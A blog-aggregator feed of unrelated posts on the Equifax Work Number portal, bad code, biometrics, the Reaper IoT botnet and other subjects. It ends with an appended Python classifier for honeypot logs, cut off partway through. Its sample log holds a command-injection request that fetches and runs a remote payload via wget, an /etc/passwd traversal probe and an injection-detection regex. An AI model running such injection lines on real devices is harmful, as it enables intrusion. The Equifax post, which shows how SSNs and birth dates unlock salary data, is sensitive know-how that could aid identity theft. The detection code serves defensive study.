What’s needed to access your salary and employment history? Go here, and enter the employer name or employer code. After that, it asks for a “user ID.” This might sound like privileged information, but in most cases this is just the employee’s Social Security number (or a portion of it).

At the next step, the site asks visitors to “enter your PIN,” short for Personal Identification Number. However, in the vast majority of cases this appears to be little more than someone’s eight-digit date of birth. The formats differ by employer, but it’s usually either yyyy/mm/dd or mm/dd/yyyy, without the slashes.

Successful validation to the system produces two sets of data: An employee’s salary and employment history going back at least a decade, and a report listing all of the entities (ostensibly, the aforementioned “credentialed verifiers”) that have previously requested and viewed this information.

In a story in the financial industry publication National Mortgage News, Equifax said: “As access to the employee portal is restored, individuals must be re-authenticated and establish a unique PIN. Therefore, the data exposed in the cyber incident will not be sufficient to access The Work Number.”

The publication said Equifax declined to answer questions about whether the timing of the portal maintenance or the decision to add new security features were in response to the original Oct. 8 report here, quoting an Equifax spokesman saying the company opted to move up and expand a planned service outage.

“At that time, we also decided to accelerate the implementation of select security enhancements to our platforms which extended the service outage timeframe,” the spokesman said.

I walked through the newer, allegedly more secure portal with a friend and source who worked at a major firm that used The Work Number at some point previously, and at first we couldn’t figure out how to enter his default PIN. A quick search for his employer’s name and “The Work Number” turned up a PDF with instructions stating that the PIN consisted of the last two digits of the employee’s birth year, and the fourth and fifth digit of their SSN.

Part of the new and improved security at The Work Number.

After passing that screen, the only “security enhancements” I saw that my source encountered was a prompt to enter his full name, date of birth, Social Security number, address, phone number and email, followed by the usual retinue of four multiple-guess “knowledge-based authentication” (KBA) questions. I’ve long been a critic of these KBA questions, because the answers usually are available using sites like Zillow and Spokeo, to say nothing of social networking profiles.

Fortunately, you can reduce the likelihood that an acquaintance, co-worker, stalker or anyone else can glean your salary history by claiming your own account, changing the PIN and selecting a half-dozen security questions and answers. As always, it’s best not to answer these questions truthfully, but to input answers that only you will know and that can’t be found using social networking sites or other public data sources.

I used to think that if you had a security freeze on your credit file at a credit bureau, the bureau would then be unable to ask these KBA questions. I’ve recently worked with several sources who had freezes on their files and yet were still asked these KBA questions. Those individuals may not have all been approved to continue whatever transaction was in progress after answering those questions, but in most cases it shocks folks who have freezes when they even get asked those KBA questions.

However, it seems that in each of the cases I’ve seen in which the person had a freeze on their credit file, the applicant was asked only non-financial questions. In other words, they were given questions that one did not necessarily need access to one’s credit card or mortgage statements to answer successfully — such as the names of previous streets resided on or the names of lenders used in the past.

What’s interesting is that these types of questions tend to be easier to answer than, say, ‘What was the amount of your most recent car loan payment?’ That suggests that ID thieves could find people with credit freezes an easier target of services like this one because they face far easier KBA questions after they provide all of the target’s static information (DOB, SSN, etc).

If that sounds ironic or sad, remember that we’re talking about a company whose breach more severely impacted consumers who paid Equifax whatever fees the company is allowed to charge under state laws to freeze the consumer’s credit file.

We all sort of assumed this was the case when Equifax initially disclosed on Sept. 7 that the breach resulted in the theft of SSNs and other data on 143+ million people, as well as some 209,000 credit and debit card numbers. But in written notifications recently mailed to victims of the breach, Equifax made it crystal clear that their credit card data was stolen because they once used it at Equifax to request a credit freeze or copy of their credit report.

Part of the notice Equifax mailed this week to a U.S. breach victim.

Does your current or former employer share your salary data with Equifax? If so, were you able to access your salary history via The Work Number site? Sound off in the comments below about any “security enhancements” you encountered along the way.

If you’re still unsure what you should be doing in the wake of the breach at Equifax, see this Q&A.

Worse Than FailureCodeSOD: Switching the Search

We return to Virginia N’s refactoring efforts (previously: here, and here).

This code is elegant in its stupidity, combining two anti-patterns in one glorious, “No, don’t do that, whyyyyyyyyyy!”. To wit, the for-switch, and the “build SQL statements through string concatenation”:

for (int i = 0; i < 16; i++)
{

    StringBuilder commandText = new StringBuilder();
    command = new OracleCommand();
    switch (i)
    {
        case 0:
                commandText.Append(searchbuyer);
                parameter = new OracleParameter(":BUYER_DEP", OracleDbType.Char, 2);
                parameter.Value = depBuyer;
                command.Parameters.Add(parameter);
                break;
        case 1:
                commandText.Append(searchStock);
                break;
        case 2:
                commandText.Append(searchArbo1+"E"+searchArbo2);
                break;
        case 3:
                commandText.Append(searchArbo1+"V"+searchArbo2);
                break;
        case 4:
                commandText.Append(searchArbo1+"M"+searchArbo2);
                break;
        case 5:
                commandText.Append(searchArbo1+"P"+searchArbo2);
                break;
        case 6:
                commandText.Append(searchArbo1+"S"+searchArbo2);
                break;
        case 7:
                commandText.Append(searchArbo1+"O"+searchArbo2);
                break;
        case 8:
                commandText.Append(searchArbo1+"T"+searchArbo2);
                break;
        case 9:
                commandText.Append(searchArbo1+"A"+searchArbo2);
                break;
        case 10:
                commandText.Append(searchArbo1+"I"+searchArbo2);
                break;
        case 11:
                commandText.Append(searchDemandeur);
                break;
        case 12:
                commandText.Append(searchDoc);
                break;
        case 13:
                commandText.Append(searchForm);
                break;
        case 14:
                commandText.Append(searchCertif);
                break;
        case 15:
                commandText.Append(searchFormV);
                break;
    }
    //… use the query
}

And for bonus points, this takes a round trip to the database for every iteration of the loop, for 16 hits per search. EVMPSOTAI, indeed.


CryptogramHeart Size: Yet Another Biometric

Turns out that heart size doesn't change throughout your adult life, and you can use low-level Doppler radar to scan the size -- even at a distance -- as a biometric.

Research paper (to be available soon).

Rondam RamblingsA candid glimpse inside the incredibly twisted mind of Donald Trump Jr.

Donald Trump Jr. inadvertently (I'm pretty sure) gave us a glimpse of his true face yesterday when he tweeted: I'm going to take half of Chloe's candy tonight [and] give it to some kid who sat at home. It's never to [sic] early to teach her about socialism. Let's think about exactly what the lesson is supposed to be here: trick-or-treating is OK, a shining example of what capitalism is supposed

TEDGallery: Just about to open doors at TEDWomen 2017 at the Orpheum Theater

Rehearsal days involve a lot of laptop time as our video and stage teams fine-tune the details to create the amazing experience that will be TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We’re about to open the doors for the audience to join TEDWomen in New Orleans — three days of powerful talks from women and men that take on the issues breaking now and share soul-deep ideas for creating better lives going forward. TEDWomen is happening in an astonishing theater, new to us and freshly renovated but nearly a century old. In itself it’s a story of renewal and rejuvenation: Flooded during Katrina, the theater was meticulously restored and reopened in 2015. During our rehearsal and setup days, we’re pretty unabashedly taking hundreds of pictures of this glorious interior — which is about to rock with the sounds of the Lake Area Girls Choir backing the Broadway star Deborah Cox.

Photographer Ryan Lash captures this amazing theater from three angles — from the top of the house, from the first balcony, and a reverse shot from backstage capturing yet another impromptu crew meeting on the red circle.

The speaker’s-eye view from the red circle, looking out at the audience seating at the Orpheum Theater in New Orleans. Photo: Ryan Lash / TED

Follow news from TEDWomen in a bunch of ways — here on the TED Blog, on @TEDTalks, on the hashtag #tedwomen. Tune in for some amazing Facebook Live interviews with four speakers throughout Thursday and Friday. And of course, look for talks from TEDWomen that will post on TED.com throughout the year to come!



CryptogramGoogle Login Security for High-Risk Users

Google has a new login service for high-risk users. It's good, but unforgiving.

Logging in from a desktop will require a special USB key, while accessing your data from a mobile device will similarly require a Bluetooth dongle. All non-Google services and apps will be exiled from reaching into your Gmail or Google Drive. Google's malware scanners will use a more intensive process to quarantine and analyze incoming documents. And if you forget your password, or lose your hardware login keys, you'll have to jump through more hoops than ever to regain access, the better to foil any intruders who would abuse that process to circumvent all of Google's other safeguards.

It's called Advanced Protection.

Rondam RamblingsRandom tweet-length thought of the day

Why is it that when a Muslim kills 8 people it's the Democrats' fault for supporting diversity visas, but when a white man kills 59 people it's not the Republicans' fault for opposing gun control?

Worse Than FailureCodeSOD: An Academic Consideration

Becky is not a programmer, but a physicist. She works in academia, alongside other scientists. Modern science generally requires some sort of heavy computation, which means scientists write code. It’s often not very good code, but that’s just the nature of the beast. The code exists to provide an analysis, not to be deployed as an app to the masses.

Most of the time. A few civil engineers were working on a brand new Android app for traffic analysis, with plans to distribute it. Unfortunately, they had some problems, and wanted more experienced eyes. Becky set aside the Fortran77 she was working on to trace through their Java code, and found this:

public class MainActivity extends Activity {
    private static double GpsLon = 0.00;
    public double getGpsLon() { return GpsLon; }
    public void setGpsLon(double value) { GpsLon = value; }
    private static boolean saveComLogeFile = true;
    public boolean getSaveComLogeFile() {return saveComLogeFile;}
    public void setSaveComLogeFile(boolean saveComLogeFile) {this.saveComLogeFile = saveComLogeFile;}
    // more than 70 similar static variables with non-static getters and setters
}

public class GpsWlan implements Runnable
{
    static MainActivity ma = new MainActivity();
    @Override
    public void run()
    {
        ma.setGpsLon(1.234);
    }
}

At this point in the article, I’d normally explain to you what this code is trying to do, and why it’s bad. Honestly though, I can’t even answer the first question. MainActivity is a megaclass of properties- and those properties are all static. That’s a fine approach for configuration settings, but you usually pair it with static getters and setters.

But the place where they actually set these variables is the really weird part of this. By implementing Runnable, they’re implying that GpsWlan should be run as its own thread- great if you’re doing heavy I/O or something, but… for setting a property? A static property? With no syncing or locking? Sure, they are setting it to a literal value, so we apparently don’t need to be too worried about race conditions, but… why?

Well, there isn’t a reason. Becky explains the process used to develop this code: “Here, Researcher N learns to program by asking Researcher N–1 for their code, learning from it and tweaking what they had.” I'm going to add a little correction: they're not learning anything from the code. This is cargo cult programming- the code they borrowed did this, so their code does it too.


Don MartiAlways run a shell script from the directory it lives in

Always run a shell script in the directory in which it appears, and change back to the directory you were in when you ran it even if it fails.

trap 'popd >/dev/null' EXIT
pushd "$PWD" >/dev/null
cd "$(dirname "$0")" || exit 1

Works for me in bash. The pushd command does a cd but saves the directory where you were on a stack, and popd pops the saved directory from the stack. The trap ... EXIT is a bash way to run something when the script exits, no matter how, and dirname "$0" is the directory name of the script.

(Taken from the deploy.sh script that rebuilds and deploys this blog, so if you can read this, it works.)
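A sturdier version of the same idea, added here as an example and not taken from the deploy.sh in the post. It quotes every path (the three-liner breaks on a directory with a space in its name), resolves the script's directory through BASH_SOURCE so the answer is right even when the file is sourced rather than executed, and gets the "always change back" guarantee from a subshell instead of a trap. One caveat worth stating: a script that is executed (./deploy.sh) runs in its own process, so its cd never reaches the shell that launched it and there is nothing to restore; the pushd/popd/trap form only earns its keep when the file is sourced (. deploy.sh) into an interactive shell, which is why it is kept here as a separate function. The function names are this example's own.

```bash
#!/usr/bin/env bash
# Added example (not the deploy.sh from the post): run a command from the
# directory that holds this script and leave the caller's cwd untouched.

# Absolute, symlink-resolved directory containing this file. BASH_SOURCE is
# the file's own path even when the file is sourced; $0 is the fallback for
# plain sh, where it is the script path when the script is executed.
# Resolve it once, up front, before anything changes directory, because
# $0 may be a relative path such as ./deploy.sh.
script_dir() {
    ( cd "$(dirname "${BASH_SOURCE:-$0}")" && pwd -P )
}
SCRIPT_DIR="$(script_dir)"

# Run "$@" with the cwd set to the script's directory. The subshell is the
# whole restore mechanism: a cd inside ( ) cannot leak out, whether the
# command succeeds, fails or is killed, so no trap bookkeeping is needed.
# Exit status is the command's, or 1 if the directory cannot be entered.
run_in_script_dir() {
    ( cd "$SCRIPT_DIR" || exit 1; "$@" )
}

# The trap/pushd/popd form from the post, hardened: quoted path, a failed
# pushd aborts instead of carrying on in the wrong directory, and the
# directory-stack chatter that pushd/popd print on stdout is silenced.
# Unlike run_in_script_dir this changes the *current* shell's cwd, which is
# exactly what you want from a file that is sourced, and pointless from one
# that is executed (the process's cwd dies with it anyway).
enter_script_dir() {
    pushd "$SCRIPT_DIR" >/dev/null || return 1
    trap 'popd >/dev/null' EXIT
}

# Typical use from a deploy script that is executed, not sourced:
#   run_in_script_dir make
```

The subshell form is the one to reach for in a script you run directly: it needs no trap, it cannot be defeated by an early `exit` or a `set -e` abort inside the command, and it composes (you can call it several times from the same script). Keep the pushd/popd form for files meant to be sourced.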

Sociological ImagesWhy Witchcraft Appeals to Marginalized Groups

Originally Posted at There’s Research On That! 

Photo by Tom Lee, Flickr CC

If you like Halloween, you know that witches are a popular costume choice and decoration this time of year. But the history of witches involves much more than bubbling cauldrons and flying broomsticks. Social science shows us that witchcraft has a long history of empowering marginalized groups, like women and sexual minorities, who question more traditional religious practices.

While popular images of witches often focus on magic spells, brooms, and pointed hats, witchcraft and other forms of neo-paganism have historically been used by women to push back against male-dominated religions. More traditional, hierarchical interpretations of religions like Christianity and Islam often place women in a subordinate role to men, and research finds that many women are drawn to witchcraft and other alternative spiritualities because they emphasize female empowerment, embodied rituals, and sexual freedom.

People who practice witchcraft and neo-paganism typically see sexuality and gender as key sites for social transformation and personal healing, pushing back against the Christian idea that sex and bodies are sinful. Since neo-paganism values sexual freedom and sexual diversity, LGBTQ folks and people practicing polyamory often feel a sense of belonging that they don’t find in other religious spaces.

This has also been true for young adults. In general, young adults practice religion and spirituality differently than do older generations. For example, millennials are the least likely to participate in traditional religious institutions or identify with one single religious belief system, but many still desire some combination of spirituality and community. The increase in portrayals of witchcraft and other neo-pagan religions in popular media has exposed younger generations to these communities, and research finds that teens are more often drawn to these alternative spiritual practices as a means of self-discovery and community, rather than the promise of magical powers.

Allison Nobles is a PhD candidate in sociology at the University of Minnesota and a member of The Society Pages’ graduate editorial board. Her research primarily focuses on sexuality and gender, and their intersections with race, immigration, and law.

Jacqui Frost is a PhD candidate in sociology at the University of Minnesota and the managing editor at The Society Pages. Her research interests include non-religion and religion, culture, and civic engagement.

(View original at https://thesocietypages.org/socimages)


TEDFree report: Bright ideas in business, distilled from TEDGlobal 2017

What’s a good way to remember an idea in the middle of a conference — so you can turn it into action? Take notes and brainstorm with others. At TEDGlobal 2017 in Tanzania, the Brightline Initiative inspired people to brainstorm ideas around talks they’d just watched, including Pierre Thiam’s celebration of the ancient grain fonio (watch this talk). (Photo: Ryan Lash/TED)

The Brightline Initiative helps executives implement ambitious ideas from business strategies, so it’s only fitting that the nonprofit group was onsite taking notes and holding brainstorms at TEDGlobal 2017 in Arusha, Tanzania. With the theme “Builders. Truth-Tellers. Catalysts.,” TEDGlobal was a celebration of doers and thinkers, including more than 70 speakers who’ve started companies, nonprofits, education initiatives and even movements.

We’re excited to share the Brightline Initiative’s just-released report on business ideas pulled from the talks of TEDGlobal 2017. These aren’t your typical business ideas — one speaker suggests a way to find brand-new markets by thinking beyond the physical address, while several others share how ancient traditions can spawn fresh ideas and even cutting-edge businesses. Whether you run a startup, sit in the C-suite or are known as a star employee, the ideas from these talks can spark new thinking and renew your inspiration.

Get the report here >>

PS: Look for more great ideas from the Brightline Initiative soon; this week at TED’s New York office, TED and Brightline partnered to produce an evening-length event of speakers who are creating change through smart, nuanced business thinking. Read about the event now, and watch for talks to appear on TED.com in the coming months.


CryptogramAttack on Old ANSI Random Number Generator

Almost 20 years ago, I wrote a paper that pointed to a potential flaw in the ANSI X9.17 RNG standard. Now, new research has found that the flaw exists in some implementations of the RNG standard.

Here's the research paper, the website -- complete with cute logo -- for the attack, and Matthew Green's excellent blog post on the research.

Worse Than FailureWith the Router, In the Conference Room

This is a follow-up to With the Router, In the Conference Room, revealing the… STUNNING CONCLUSION!

How It Really Ended

Darren took the case up to his boss, and then to their boss, up the management chain. No one was particularly happy with Cathy’s tone, and there was a great deal of tut-tutting and finger-wagging about professional conduct.

Ms. Scarlett, in Clue, delivering the line 'Flames, flames on the side of my face'

But she was right. It was Mr. Green who failed to follow instructions, it was Mr. Green who cost the company thousands, along with the customer relationship problems caused by Cathy’s sudden emergency trip back to the home office.

In what can only be considered a twist ending by the standards of this site, it was Mr. Green who was escorted out of the building by security.

The killer was Cathy, in the issue tracking system, with the snarky bug report.


Worse Than FailureWith the Router, In the Conference Room

One of the most important aspects of software QA is establishing a good working relationship with developers. If you want to get them to take your bug reports seriously, you have to approach them with the right attitude. If your bugs imply that their work is shoddy, they are likely to fight back on anything you submit. If you continuously submit trivial “bugs”, they will probably be returned right away with a “not an issue” or “works as designed” status. If you treat any bug like it’s a critical showstopper, they will think you’re crying wolf and not immediately jump on issues that actually are critical.

Then there are people like Mr. Green, a former coworker of submitter Darren A., who give QA a bad name. The Mr. Greens of the QA world are so incompetent that their stupidity can cause project delays, rack up thousands of dollars in support costs, and cause a crapstorm between managers. Mr. Green once ran afoul of Darren’s subordinate Cathy, lead developer on the project Mr. Green was testing.

A shot from the film Clue, where Mrs. White holds a gun in front of Col. Mustard

Cathy was en route to the United States from London for a customer visit when her phone exploded with voicemail notifications immediately upon disabling airplane mode. There were messages from Darren, Mr. Green, and anyone else remotely involved with the project. It seemed there was a crippling issue with the latest build that was preventing any further testing during an already tight timeline.

Instead of trying to determine the cause, Mr. Green just told everyone “Cathy must have checked something in without telling us.” The situation was dire enough that Cathy, lacking the ability to remotely debug anything, had to immediately return to London. Mr. Green submitted a critical bug report and waited for her to cross the Atlantic.

What happened next is perfectly preserved in the following actual bug report from this incident. Some developers are known for their rude and/or snarky responses to bug reports that offend them. What Cathy did here takes that above and beyond to a legendary level.

====
Raised:         14/May/2015
Time:           09:27
Priority:       Critical
Impact:         Severe
Raised By:      Mr. Green

Description
===========
No aspect of GODZILLA functions at present. All machines fail to connect with the server and we are unable to complete any further testing today.
All screens just give a funny message.
Loss of functionality severely impacts our testing timescales and we must now escalate to senior management to get a resolution.

15/May/2015 22:38
        User:   Cathy Scarlett
        Updated: Status
        New Value: Resolved - User Error
        Updated: Comment
        New Value:
                Thank you for this Mr. Green. I loved the fact that the entire SMT ordered me back to head office to fix
                this - 28 separate messages on my voicemail while I was waiting for my baggage.
                I was of course supposed to be fixing an issue our US customer has suffered for over a year but I
                appreciated having to turn around after I'd landed in New Jersey and jump back on the first return
                flight to Heathrow.

                Do you remember when you set up the Test room for GODZILLA Mr. Green?

                Do you remember hanging the WIFI router on a piece of string from the window handle because the
                cable wasn't long enough?

                Do you remember me telling you not to do this as it was likely to fall?

                Do you remember telling me that you sorted this out and got Networks to setup a proper WIFI router
                for all the test laptops?

                I remember this Mr. Green and I'm sure you'll remember when I show you the emails and messages.

                I walked into the test room at 10 o'clock tonight (not having slept properly for nearly
                3 days) to find the WIFI router on the floor with the network cable broken.
                        ROOT CAUSE: The string snapped

                There was a spare cable next to it so I plugged this one in instead.

                Then, because this was the correct cable, I put the WIFI unit into the mounting that was provided
                for you by networks.

                As if by magic, all the laptops started working and those 'funny messages' have now disappeared.
                GODZILLA can now carry on testing. I'm struggling to understand why I needed to fly thousands of
                miles to fix this given that you set this room up in the first place. I'm struggling to understand
                why you told the SMT that this was a software error. I'm struggling to understand why you bypassed my
                manager who would have told you all of this. I'm closing this as 'user error' because there
                isn't a category for 'F**king moron'

                72 hours of overtime to cover an aborted trip from London to New York and back:
                        £3,600

                1 emergency return flight:
                        £1,500

                1 wasted return flight
                        £300

                1 very nice unused hotel room that has no refund:
                        £400

                1 emergency taxi fare from Heathrow:
                        £200

                16 man days of testing lost
                        £6,000

                Passing my undisguised contempt for you onto SMT:
                        Priceless

Mr. Green was obviously offended by her response. He escalated it to his manager, who demanded that Cathy be fired. This left Darren in a precarious position as Cathy’s manager. Sure, it was unprofessional. But it was like getting a call from your child’s school saying they punched a bully in the nose and they want your child to be disciplined for defending themselves. Darren decided to push back at the QA manager and insist that Mr. Green was the one who should be fired.

This story might have ended with Mr. Green and Cathy forced into an uneasy truce as the company management decided that they were both too valuable to lose. But that isn’t how this story ended. Or perhaps Darren's push-back backfired, and he was the one who ended up getting fired. That also isn't how the story ended. We invite our readers to speculate, extrapolate and fabricate in the comments. Later this morning, we’ll reveal the true killer outcome…

And now, the conclusion to the story!


Planet Linux AustraliaOpenSTEM: Election Activity Bundle

For any Australian Curriculum HASS topic from Prep to at least Year 6, we can safely say “We have a resource on that!” So when, like here in Queensland, an election is suddenly called and teachers want to do some related activities in class, we actually already have the materials for you as these topics […]


Planet Linux AustraliaRussell Coker: Logic of Zombies

Most zombie movies feature shuffling hordes which prefer to eat brains but also generally eat any human flesh available. Because in most movies (pretty much everything but the 28 Days Later series [1]) zombies move slowly, they rely on flocking to be dangerous.

Generally the main way of killing zombies is severe head injury, so any time zombies succeed in their aim of eating brains they won’t get a new recruit for their horde. The TV series iZombie [2] has zombies that are mostly like normal humans as long as they get enough brains and are smart enough to plan to increase their horde. But most zombies don’t have much intelligence and show no signs of restraint so can’t plan to recruit new zombies. In 28 Days Later the zombies aren’t smart enough to avoid starving to death, in contrast to most zombie movies where the zombies aren’t smart enough to find food other than brains but seem to survive on magic.

For a human to become a member of a shuffling horde of zombies they need to be bitten but not killed. They then need to either decide to refrain from a method of suicide that precludes becoming a zombie (gunshot to the head or jumping off a building) or be unable to go through with it. Most zombie movies (I think everything other than 28 Days Later) have the transition process taking some hours, so there’s plenty of time for an infected person to kill themselves or be killed by others. Then they need to avoid having other humans notice that they are infected and kill them before they turn into a zombie. This doesn’t seem likely to be a common occurrence. It doesn’t seem likely that shuffling zombies (as opposed to the zombies in 28 Days Later or iZombie) would be able to form a horde.

In the unlikely event that shuffling zombies managed to form a horde that police couldn’t deal with I expect that earth-moving machinery could deal with them quickly. The fact that people don’t improvise armoured vehicles capable of squashing zombies is almost as ridiculous as all the sci-fi movies that feature infantry.

It’s obvious that logic isn’t involved in the choice of shuffling zombies. It’s more of a choice of whether to have the jump-scare aspect of 28 Days Later, the human-drama aspect of zombies that pass for human in iZombie, or the terror of a slowly approaching horrible fate that you can’t escape in most zombie movies.

I wonder if any of the music streaming services have a horror-movie playlist that has screechy music to set your nerves on edge without the poor plot of a horror movie. Could listening to scary music in the dark become a thing?

Worse Than FailureCodeSOD: Drain the Swamp

You may remember Virginia N from An Extinction Event, where she struggles to refactor a legacy project with some… unusual design principles. ReSharper still chokes to death on their codebase, but her management has let her know this won’t be a problem going forward.

“You see,” her boss explained, “we’re going to move the logic into stored procedures. That way, we can more easily re-use the logic between the Windows Forms client and the Web app.”

“Oh, there’s going to be a web app, now?” Virginia asked.

“Yes! They’re going to use best practices, like unit testing, so that they don’t end up with the same kind of mess we have,” her boss said.

Virginia was halfway to filing a request for a transfer when she heard more about the web project. Then she heard about their plan. They weren’t going to simply build a web-client for their backend, but instead were going to build an inner platform. The page logic would be a simple template, and all of the rules, styling, data and display logic would be stored as data in the database. “It’s gonna be really flexible!”

Virginia decided to stick with the fetid field she knew, instead of the “green field” which was going to be a fetid swamp in a matter of weeks.

In Virginia’s swamp, she has many, many 40,000-line classes. Code at that scale has no real cohesion, which is how Virginia ends up finding variables named thus:

public bool IReallyDontWantToFetchTheDataOnLoadButDontWantToChangeTheOtherVariablesCauseWhoKnowsWhatWillHappen=false;

It’s at least descriptive. It also exists in the class side-by-side with variables like blnGetData, GetDataOnFormLoad, and GetDataOnFormrLoadS.

Elsewhere in the same file, they have a different problem. They added a control to the view, and needed an accessor method to decide whether it was visible or not. Actually, they needed a few, and they knew that the form would be changing over time, so they needed something that was “dynamic”.

Now, they could have simply added properties and getters/setters as the form changed and dealt with the follow-on changes, but someone decided to stress that “Closed for Modification” was good object-oriented practice. They left out the “Open for Extension” half of the open/closed principle, so they used this code instead, which uses a few index properties to decide which control should be modified:

// m_IndexChant, m_IndexLB, ctlRecherche and panFilterSection are fields of
// the form; note that panFilterSection is assigned here but never declared locally.
private void SetVisiblePicNdt()
{
    // Build the name of the button to hide from a numeric index.
    string NomBtnNDT = "";
    string NomBtnChant = "";
    if (m_IndexChant > 0)
    {
        NomBtnNDT = "btn" + (m_IndexChant + 1).ToString();
        NomBtnChant = "btn" + (m_IndexChant).ToString(); // computed but never read
    }
    else
    {
        NomBtnNDT = "btn" + (m_IndexLB + 1).ToString();
    }

    // Walk the control tree by name: ctlRecherche -> sectMain -> panFilterSection.
    Control sectMain = null;
    for (int i = 0; i < ctlRecherche.Controls.Count; i++)
    {
        if (ctlRecherche.Controls[i].Name == "sectMain")
        {
            sectMain = ctlRecherche.Controls[i];
            break;
        }
    }
    if (sectMain != null)
    {
        for (int i = 0; i < sectMain.Controls.Count; i++)
        {
            if (sectMain.Controls[i].Name == "panFilterSection")
            {
                panFilterSection = sectMain.Controls[i];
                break;
            }
        }
    }

    // Hide the first child of panFilterSection whose Name matches the computed string.
    if (panFilterSection != null)
    {
        for (int i = 0; i < panFilterSection.Controls.Count; i++)
        {
            if (panFilterSection.Controls[i].Name == NomBtnNDT)
            {
                panFilterSection.Controls[i].Visible = false;
                break;
            }
        }
    }
}

Virginia has many more horrors to share, so expect more examples from this code base.

CryptogramFriday Squid Blogging: Steel Mesh Giant Squid Used as Artificial Reef

Researchers in the British Virgin Islands have sunk a giant squid made out of steel mesh to serve as an artificial reef.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Krebs on SecurityFear the Reaper, or Reaper Madness?

Last week we looked at reports from China and Israel about a new “Internet of Things” malware strain called “Reaper” that researchers said infected more than a million organizations by targeting newfound security weaknesses in countless Internet routers, security cameras and digital video recorders (DVRs). Now some botnet experts are calling on people to stop the “Reaper Madness,” saying the actual number of IoT devices infected with Reaper right now is much smaller.

Arbor Networks said it believes the size of the Reaper botnet currently fluctuates between 10,000 and 20,000 bots total. Arbor notes that this can change any time.

Reaper was based in part on “Mirai,” the IoT malware designed to knock Web sites offline with high-powered data floods, and the strain that powered most of the largest cyberattacks of the past year. So it’s worrisome to think someone may have just built an army of a million IoT drones that could be used in crippling, coordinated assaults capable of wiping most networks offline.

If criminals haven’t yet built a million-strong botnet using the current pool of vulnerable devices, they certainly have the capacity to do so.

“An additional 2 million hosts have been identified by the botnet scanners as potential Reaper nodes, but have not been subsumed into the botnet,” Arbor’s ASERT team wrote, explaining that the coders may have intentionally slowed how quickly the malware spreads to keep it quiet and under the radar.

Arbor says Reaper is likely being built to serve as the machine powering a giant attack-for-hire service known as a “booter” or “stresser” service.

“Our current assessment of Reaper is that it is likely intended for use as a booter/stresser service primarily serving the intra-China DDoS-for-hire market,” Arbor wrote. “Reaper appears to be a product of the Chinese criminal underground; some of the general Reaper code is based on the Mirai IoT malware, but it is not an outright Mirai clone.”

On Thursday I asked Israeli cybersecurity firm Check Point — the source of the one-million Reaper clones claim — how it arrived at the figure of a million infected organizations.

Check Point said it knows of over 30,000 infected devices that scanned for additional vulnerable devices.

“We had a prism into these attacks from a data set that only contains a few hundreds of networks, out of which 60% were being scanned,” said Maya Horowitz, a group manager in the threat intelligence division of Check Point. “Thus we assume that the numbers globally are much higher, in at least 1 order of magnitude.”

Reaper borrows programming code from Mirai. But unlike Mirai, which infects systems after trying dozens of factory-default username and password combinations, Reaper targets nine security holes across a range of consumer and commercial products. About half of those vulnerabilities were discovered only in the past few months, and so a great many devices likely remain unpatched against Reaper.

Chinese cybersecurity firm Netlab 360, which published its own alert on Reaper shortly after Check Point’s advisory, issued a revised post on Oct. 25 stating that the largest gathering of Reaper systems it has seen by a single malware server is 28,000. Netlab’s original blog post has links to patches for the nine security flaws exploited by Reaper.
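The distinction drawn above between Mirai-style credential guessing and Reaper-style vulnerability probing, and the sensor-based bot counts from Arbor and Check Point, both come down to the same operation: classifying the sources that hit a honeypot and counting each one once. The following is an added example, not code from Krebs, Arbor, Check Point or Netlab 360: a small Python classifier run over constructed telnet and HTTP honeypot log lines. The log format, the sliding-window threshold for failed logins, and the generic traversal and shell-metacharacter indicators (including their URL-encoded forms) are all assumptions for illustration; the article does not list Reaper's nine exploits and this code does not attempt to match them.

```python
"""Classify IoT scanner probes as credential guessing (Mirai style) or
exploit-based probing (Reaper style) and count distinct sources per class.

Added example with a constructed log format; not the tooling of any
vendor named in the article."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real Reaper telemetry). One telnet and
# one HTTP honeypot write: <ISO timestamp> <service> <source IP> <detail>.
SAMPLE_LOG = """\
2017-10-26T10:00:01Z telnet 203.0.113.5 login=admin pass=admin result=fail
2017-10-26T10:00:02Z telnet 203.0.113.5 login=root pass=12345 result=fail
2017-10-26T10:00:03Z telnet 203.0.113.5 login=root pass=vizxv result=fail
2017-10-26T10:00:04Z telnet 203.0.113.5 login=support pass=support result=fail
2017-10-26T10:00:05Z telnet 203.0.113.5 login=admin pass=1234 result=fail
2017-10-26T10:00:09Z http 198.51.100.7 GET /cgi-bin/admin.cgi?cmd=;wget%20http://198.51.100.7/x;sh%20x
2017-10-26T10:00:10Z http 198.51.100.8 GET /../../../../etc/passwd
2017-10-26T10:00:11Z http 198.51.100.9 GET /index.html
2017-10-26T10:00:12Z telnet 203.0.113.6 login=admin pass=admin result=fail
2017-10-26T10:00:20Z http 198.51.100.7 GET /cgi-bin/admin.cgi?cmd=$(id)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<svc>telnet|http)\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\s+(?P<detail>.*)$"
)

# Generic indicators of traversal or command injection against a device web
# UI, plus URL-encoded ';' and '|'. Assumption for illustration only: this is
# not Reaper's exploit list.
EXPLOIT_RE = re.compile(r"(\.\./|;|\||`|\$\(|%3b|%7c)", re.IGNORECASE)


def parse_line(line):
    """Parse one honeypot line into a dict, or None if it is not in the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def classify(events, window=timedelta(seconds=60), threshold=3):
    """Return {class_name: set of source IPs} for events in timestamp order.

    credential_guessing: at least `threshold` failed telnet logins from one
                         source inside a sliding `window` (default-password runs).
    exploit_probe:       an HTTP request carrying traversal or shell
                         metacharacters (vulnerability probing).
    Sources that match neither rule are not counted at all.
    """
    classes = defaultdict(set)
    fails = defaultdict(list)  # source IP -> timestamps of failed telnet logins
    for ev in events:
        src = ev["src"]
        if ev["svc"] == "telnet" and "result=fail" in ev["detail"]:
            recent = fails[src]
            recent.append(ev["ts"])
            # Drop failures that have fallen out of the sliding window.
            while recent and ev["ts"] - recent[0] > window:
                recent.pop(0)
            if len(recent) >= threshold:
                classes["credential_guessing"].add(src)
        elif ev["svc"] == "http" and EXPLOIT_RE.search(ev["detail"]):
            classes["exploit_probe"].add(src)
    return classes


def summarize(log_text):
    """Distinct scanning sources per class, which is what a sensor can honestly report."""
    events = [e for e in (parse_line(ln) for ln in log_text.splitlines()) if e]
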